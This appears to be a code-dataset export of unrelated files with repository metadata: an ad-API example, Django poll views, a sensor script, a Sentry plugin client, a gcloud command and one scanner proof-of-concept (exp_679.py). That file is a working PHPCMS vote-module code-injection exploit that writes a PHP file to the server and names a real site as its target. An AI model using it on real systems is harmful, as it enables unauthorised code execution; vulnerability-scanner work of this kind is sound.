| 2021-01-10T10:01:09.445419 | 2011-04-14T18:25:38 | 2011-04-14T18:25:38 | 52,676,942 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,266 |
py
|
#!/usr/bin/python
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example gets all line item creative associations (LICA) for a given
line item id. The statement retrieves up to the maximum page size limit of 500.
To create LICAs, run create_licas.py."""
__author__ = '[email protected] (Stan Grinberg)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.append(os.path.join('..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle.dfp.DfpClient import DfpClient
# Initialize client object.
client = DfpClient(path=os.path.join('..', '..', '..', '..'))
# Initialize appropriate service. By default, the request is always made against
# the sandbox environment.
lica_service = client.GetLineItemCreativeAssociationService(
'https://sandbox.google.com', 'v201101')
# Set the id of the line item to get LICAs by.
line_item_id = 'INSERT_LINE_ITEM_ID_HERE'
# Create statement object to only select LICAs for the given line item id.
values = [{
'key': 'lineItemId',
'value': {
'xsi_type': 'NumberValue',
'value': line_item_id
}
}]
filter_statement = {'query': 'WHERE lineItemId = :lineItemId LIMIT 500',
'values': values}
# Get LICAs by statement.
licas = lica_service.GetLineItemCreativeAssociationsByStatement(
filter_statement)[0]['results']
# Display results.
for lica in licas:
print ('LICA with line item id \'%s\', creative id \'%s\', and status '
'\'%s\' was found.' % (lica['id'], lica['creativeId'], lica['status']))
print
print 'Number of results found: %s' % len(licas)
|
[
"api.sgrinberg@7990c6e4-1bfd-11df-85e6-9b4bd7dd5138"
] |
api.sgrinberg@7990c6e4-1bfd-11df-85e6-9b4bd7dd5138
|
405974db9681a1efc9bb65d55fa0ae64ee33d230
|
94470cf07f402b1c7824e92a852cd3203f94ac4a
|
/polls/apiviews.py
|
6f6ca88b9da4638cbf0f4888e4305f24fa9ffee5
|
[] |
no_license
|
jbeltranleon/pollsapi_django_rest
|
c509bf0b0c1e2db870ed8a4aaa1647bf74c5f8cd
|
0855820541064ffd77dbd1c6e77f695d4f18e517
|
refs/heads/master
| 2020-04-14T17:55:02.364183 | 2019-01-04T16:01:46 | 2019-01-04T16:01:46 | 163,999,126 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,203 |
py
|
from rest_framework import generics
from rest_framework.views import APIView
from rest_framework import status
from rest_framework.response import Response
from .models import Poll, Choice
from .serializers import PollSerializer, ChoiceSerializer,\
VoteSerializer
class PollList(generics.ListCreateAPIView):
queryset = Poll.objects.all()
serializer_class = PollSerializer
class PollDetail(generics.RetrieveDestroyAPIView):
queryset = Poll.objects.all()
serializer_class = PollSerializer
class ChoiceList(generics.ListCreateAPIView):
def get_queryset(self):
queryset = Choice.objects.filter(poll_id=self.kwargs["pk"])
return queryset
serializer_class = ChoiceSerializer
class CreateVote(APIView):
def post(self, request, pk, choice_pk):
voted_by = request.data.get("voted_by")
data = {'choice': choice_pk, 'poll': pk, 'voted_by': voted_by}
serializer = VoteSerializer(data=data)
if serializer.is_valid():
vote = serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
else:
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
|
[
"[email protected]"
] | |
cdf669514aaf2c1d7c33248746135d7b0232f29f
|
184ab7b1f5d6c4a4382cf4ffcf50bbad0f157ef1
|
/library/aht10/aht10_example.py
|
46df77a8a71666025fda1409a3c5b7ebdbed9497
|
[] |
no_license
|
RT-Thread/mpy-snippets
|
fdd257bb9f44cdc92e52cd39cdc88a57d736fb26
|
9296d559da275f51845cb9c2f8e2010f66f72cc1
|
refs/heads/master
| 2023-06-14T02:20:05.449559 | 2020-06-03T02:34:47 | 2020-06-03T02:35:19 | 198,854,793 | 28 | 18 | null | 2020-05-06T11:32:46 | 2019-07-25T15:14:56 |
Python
|
UTF-8
|
Python
| false | false | 517 |
py
|
from machine import I2C, Pin
from aht10 import AHT10
PIN_CLK = 54 # PD6, get the pin number from get_pin_number.py
PIN_SDA = 33 # PC1
clk = Pin(("clk", PIN_CLK), Pin.OUT_OD) # Select the PIN_CLK as the clock
sda = Pin(("sda", PIN_SDA), Pin.OUT_OD) # Select the PIN_SDA as the data line
i2c = I2C(-1, clk, sda, freq=100000)
sensor = AHT10(i2c)
sensor.sensor_init()
sensor.is_calibration_enabled()
print("current temp: %.2f "%sensor.read_temperature())
print("current humi: %.2f %%"%sensor.read_humidity())
|
[
"[email protected]"
] | |
e2e44ffd1b8897513aaba446dd704ac14b2c5945
|
35dbd536a17d7127a1dd1c70a2903ea0a94a84c2
|
/src/sentry_plugins/sessionstack/client.py
|
2c50f1bafe960bbe0331c77cff05e234168642de
|
[
"Apache-2.0",
"BUSL-1.1"
] |
permissive
|
nagyist/sentry
|
efb3ef642bd0431990ca08c8296217dabf86a3bf
|
d9dd4f382f96b5c4576b64cbf015db651556c18b
|
refs/heads/master
| 2023-09-04T02:55:37.223029 | 2023-01-09T15:09:44 | 2023-01-09T15:09:44 | 48,165,782 | 0 | 0 |
BSD-3-Clause
| 2022-12-16T19:13:54 | 2015-12-17T09:42:42 |
Python
|
UTF-8
|
Python
| false | false | 4,683 |
py
|
import requests
from sentry.http import safe_urlopen
from sentry.utils import json
from .utils import add_query_params, get_basic_auth, remove_trailing_slashes
ACCESS_TOKEN_NAME = "Sentry"
DEFAULT_SENTRY_SOURCE = "sentry"
API_URL = "https://api.sessionstack.com"
PLAYER_URL = "https://app.sessionstack.com/player"
WEBSITES_ENDPOINT = "/v1/websites/{}"
SESSION_ENDPOINT = "/v1/websites/{}/sessions/{}"
ACCESS_TOKENS_ENDPOINT = "/v1/websites/{}/sessions/{}/access_tokens"
SESSION_URL_PATH = "/#/sessions/"
MILLISECONDS_BEFORE_EVENT = 5000
class SessionStackClient:
def __init__(self, account_email, api_token, website_id, **kwargs):
self.website_id = website_id
api_url = kwargs.get("api_url") or API_URL
self.api_url = remove_trailing_slashes(api_url)
player_url = kwargs.get("player_url") or PLAYER_URL
self.player_url = remove_trailing_slashes(player_url)
self.request_headers = {
"Authorization": get_basic_auth(account_email, api_token),
"Content-Type": "application/json",
}
def validate_api_access(self):
website_endpoint = WEBSITES_ENDPOINT.format(self.website_id)
try:
response = self._make_request(website_endpoint, "GET")
except requests.exceptions.ConnectionError:
raise InvalidApiUrlError
if response.status_code == requests.codes.UNAUTHORIZED:
raise UnauthorizedError
elif response.status_code == requests.codes.BAD_REQUEST:
raise InvalidWebsiteIdError
elif response.status_code == requests.codes.NOT_FOUND:
raise InvalidApiUrlError
response.raise_for_status()
def get_session_url(self, session_id, event_timestamp):
player_url = self.player_url + SESSION_URL_PATH + session_id
query_params = {}
query_params["source"] = DEFAULT_SENTRY_SOURCE
access_token = self._get_access_token(session_id)
if access_token is not None:
query_params["access_token"] = access_token
if event_timestamp is not None:
start_timestamp = self._get_session_start_timestamp(session_id)
if start_timestamp is not None:
pause_at = event_timestamp - start_timestamp
play_from = pause_at - MILLISECONDS_BEFORE_EVENT
query_params["pause_at"] = pause_at
query_params["play_from"] = play_from
return add_query_params(player_url, query_params)
def _get_access_token(self, session_id):
access_token = self._create_access_token(session_id)
if not access_token:
access_token = self._get_existing_access_token(session_id)
return access_token
def _get_existing_access_token(self, session_id):
response = self._make_access_tokens_request(session_id, "GET")
if response.status_code != requests.codes.OK:
return None
access_tokens = json.loads(response.content).get("data")
for token in access_tokens:
token_name = token.get("name")
if token_name == ACCESS_TOKEN_NAME:
return token.get("access_token")
return None
def _create_access_token(self, session_id):
response = self._make_access_tokens_request(
session_id=session_id, method="POST", body={"name": ACCESS_TOKEN_NAME}
)
if response.status_code != requests.codes.OK:
return None
return json.loads(response.content).get("access_token")
def _make_access_tokens_request(self, session_id, method, **kwargs):
access_tokens_endpoint = self._get_access_tokens_endpoint(session_id)
return self._make_request(access_tokens_endpoint, method, **kwargs)
def _get_access_tokens_endpoint(self, session_id):
return ACCESS_TOKENS_ENDPOINT.format(self.website_id, session_id)
def _get_session_start_timestamp(self, session_id):
endpoint = SESSION_ENDPOINT.format(self.website_id, session_id)
response = self._make_request(endpoint, "GET")
if response.status_code == requests.codes.OK:
return json.loads(response.content).get("client_start")
def _make_request(self, endpoint, method, **kwargs):
url = self.api_url + endpoint
request_kwargs = {"method": method, "headers": self.request_headers}
body = kwargs.get("body")
if body:
request_kwargs["json"] = body
return safe_urlopen(url, **request_kwargs)
class UnauthorizedError(Exception):
pass
class InvalidWebsiteIdError(Exception):
pass
class InvalidApiUrlError(Exception):
pass
|
[
"[email protected]"
] | |
3a4928e43a8d2eb7a9e58b5e4c3c04eee176b3f5
|
0798277f2706998ab80442ac931579eb47f676e5
|
/bin/metric-markdown
|
ed615b4e0809a60c37d486fe5df8f258f20d47d9
|
[
"Apache-2.0"
] |
permissive
|
isabella232/pulse-api-cli
|
49ed38b0694ab289802f69ee6df4911cf3378e3f
|
b01ca65b442eed19faac309c9d62bbc3cb2c098f
|
refs/heads/master
| 2023-03-18T00:23:15.295727 | 2016-05-13T15:44:08 | 2016-05-13T15:44:08 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 817 |
#!/usr/bin/env python
#
# Copyright 2015 BMC Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from boundary import MetricMarkdown
"""
Reads the plugin.json manifest file looks up the definition and then outputs a markdown table
"""
if __name__ == "__main__":
c = MetricMarkdown()
c.execute()
|
[
"[email protected]"
] | ||
95d38eb622dd57ea6cf2bba55e5202edeb6e0e3b
|
43ff15a7989576712d0e51f0ed32e3a4510273c0
|
/tools/pocs/bugscan/exp_679.py
|
798104fb95f83ba1ff04752dfd711df064cc3623
|
[] |
no_license
|
v1cker/kekescan
|
f2b51d91a9d6496e2cdc767eb6a600171f513449
|
3daa1775648439ba9e0003a376f90b601820290e
|
refs/heads/master
| 2020-09-19T16:26:56.522453 | 2017-06-15T02:55:24 | 2017-06-15T02:55:24 | 94,495,007 | 6 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,954 |
py
|
# -*- coding: utf-8 -*-
from dummy import *
from miniCurl import Curl
curl = Curl()
# !/usr/bin/dev python
# -*- coding:utf-8 -*-
"""
reference:
http://www.wooyun.org/bugs/wooyun-2015-0104157
http://www.beebeeto.com/pdb/poc-2015-0086/
"""
import re
import urllib
import urllib2
import base64
import random
def get_vote_links(args):
vul_url = args
vote_url = '%sindex.php?m=vote' % vul_url
code, head, res, _, _ = curl.curl(vote_url)
ids = []
for miter in re.finditer(r'<a href=.*?subjectid=(?P<id>\d+)', res, re.DOTALL):
ids.append(miter.group('id'))
if len(ids) == 0:
return None
return list(set(ids))
def assign(service, args):
if service == 'phpcms':
return True, args
pass
def audit(args):
vul_url = args
ids = get_vote_links(args)
file_name = 'w2x5Tt_%s.php' % random.randint(1,3000)
base64_name = base64.b64encode(file_name)
if ids:
for i in ids:
exploit_url = '%sindex.php?m=vote&c=index&a=post&subjectid=%s&siteid=1' % (vul_url, i)
payload = {'subjectid': 1,
'radio[]': ');fputs(fopen(base64_decode(%s),w),"vulnerable test");' % base64_name}
post_data = urllib.urlencode(payload)
code,head,body,_,_=curl.curl('-d "%s" %s' % (post_data, exploit_url))
if code==200:
verify_url = '%sindex.php?m=vote&c=index&a=result&subjectid=%s&siteid=1' % (vul_url, i)
code,head,body,_,_=curl.curl(verify_url)
if code==200:
shell_url = '%s%s' % (vul_url, file_name)
code, head, res, _, _ = curl.curl(shell_url)
if code == 200 and 'vulnerable test' in res:
security_hole(vul_url)
if __name__ == "__main__":
from dummy import *
audit(assign('phpcms', 'http://www.jkb.com.cn/')[1])
|
[
"[email protected]"
] | |
4aff36fdb71b2bbc4fd29e2773506848f06a1fd6
|
8a7d5d67052892dd5d2a748282958f6244d963c6
|
/google-cloud-sdk/lib/surface/app/domain_mappings/delete.py
|
32842caf145b27ecec1a4e5410e7656b9643a037
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
KisleK/capstone
|
7d1d622bd5ca4cd355302778a02dc6d32ed00c88
|
fcef874f4fcef4b74ca016ca7bff92677673fded
|
refs/heads/master
| 2021-07-04T03:29:44.888340 | 2017-07-24T16:16:33 | 2017-07-24T16:16:33 | 93,699,673 | 0 | 2 | null | 2020-07-24T22:44:28 | 2017-06-08T02:34:17 |
Python
|
UTF-8
|
Python
| false | false | 1,812 |
py
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Surface for deleting an App Engine domain mapping."""
from googlecloudsdk.api_lib.app.api import appengine_domains_api_client as api_client
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.app import flags
from googlecloudsdk.core import log
from googlecloudsdk.core.console import console_io
class Delete(base.DeleteCommand):
"""Deletes a specified domain mapping."""
detailed_help = {
'DESCRIPTION':
'{description}',
'EXAMPLES':
"""\
To delete an App Engine domain mapping, run:
$ {command} '*.example.com'
""",
}
@staticmethod
def Args(parser):
flags.DOMAIN_FLAG.AddToParser(parser)
def Run(self, args):
console_io.PromptContinue(
prompt_string=('Deleting mapping [{0}]. This will stop your app from'
' serving from this domain.'.format(args.domain)),
cancel_on_no=True)
if self.ReleaseTrack() == base.ReleaseTrack.ALPHA:
client = api_client.AppengineDomainsApiAlphaClient.GetApiClient()
else:
client = api_client.AppengineDomainsApiClient.GetApiClient()
client.DeleteDomainMapping(args.domain)
log.DeletedResource(args.domain)
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.